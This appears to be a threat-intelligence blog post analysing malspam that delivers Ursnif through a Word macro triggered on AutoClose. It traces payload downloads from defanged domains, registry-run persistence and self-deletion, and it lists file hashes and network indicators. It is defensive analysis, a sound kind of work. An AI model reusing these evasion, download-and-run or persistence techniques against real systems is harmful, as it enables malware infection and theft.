Malspam Distributing Ursnif (Gozi ISFB)

A user received malspam with a .doc attachment. Static analysis of the file showed it was a Microsoft Word 2007+ document with an embedded macro located in vbaProject.bin.

The malware authors trick victims into enabling macros (Enable Content) and, to better evade sandboxes, use AutoClose to execute the macro after the file has been closed.

image1Image file from the document



Dynamic analysis of the code via a debugger quickly shows the string we’re looking for:

debugger edited

After closing the document, we can see the GET request to sukiebuchnieohuelivobos[.]com/AFK/lima.php?utma=versusf:

fiddler output

The User-Agent string used for this request was “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; InfoPath.3)”. Furthermore, you can see the script returned by the remote server in the image above.

Decoding it shows the following PowerShell command:


The GET requests are shown below:

GET requests

The GET request for sukiebuchnieohuelivobos[.]com/AFK/versusf.pfx returns the malware payload:

MZ cannot be run in DOS mode

The GET request for sukiebuchnieohuelivobos[.]com/s.php?id=versusf simply returned “tid=versusf”.

The GET request for cash4lcd[.]com/Stat.counter returned the following command:

more powershell

This generated the GET request for workswell[.]at/images/1300.exe:

second payload

Both payloads were downloaded to %AppData% and then detonated:


For persistence, 661.exe sets autostart registry key “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Appltdll:


Process 661.exe then created a copy of itself at “C:\Users\<User>\AppData\Roaming\Microsoft\BtpamRes\BthTtons.exe”:

appdata microsoft

661.exe creates a .bat file in a folder in %Temp%, writes to it, and then creates process cmd.exe. Process cmd.exe then reads from the .bat file, spawns cmd.exe as a child process, and then uses that to detonate BthTtons.exe. Process BthTtons.exe eventually deletes 661.exe.

Below is the process tree, which might give you a better understanding of what happened:

process tree

Post-infection traffic shows follow-up GET requests:

post-infection GET requests

These GET requests appear to download files associated with the Tor functionality.

There is also this registry entry at HKCU\SOFTWARE\AppDataLow\Software\Microsoft\:

reg edit

DNS queries and responses:

dns queries and responses

Some post-infection traffic:

port 443

More post-infection traffic found in the VT report:

VT HTTP requests


SHA256: f0bdd862d6eced44b6f0a0a00681302994782275902c23a6be4baa1d4e98a8e6
File name: malspam.doc
Hybrid-Analysis report

SHA256: 041ad28cf8a6c03953910ea6dec3987ffd4daf729cce2a87e9bf68c480c0918e
File name: 62f5e05a.exe
Hybrid-Analysis report

SHA256: 0358ac37ad7a3bd29d19ff06d243666add9c2255bae1eb2bb32f0538440388c7
File name: 661.exe
Hybrid-Analysis report

Network Based IOCs:
  • – GET /AFK/lima.php?utma=versusf
  • – GET /AFK/versusf.pfx
  • – GET /s.php?id=versusf
  • – GET /Stat.counter
  • www.workswell[.]at – GET /images/1300.exe
  • www.dietaesaluteonline[.]it – GET /api/456.bin
  • – GET /p.png
  • – GET /assets/images//C_2F_2Bm.jpeg
  • – POST /assets/images//_2BHk.gif
  • – GET /include/p1.pif


Password is “infected”



Article Link: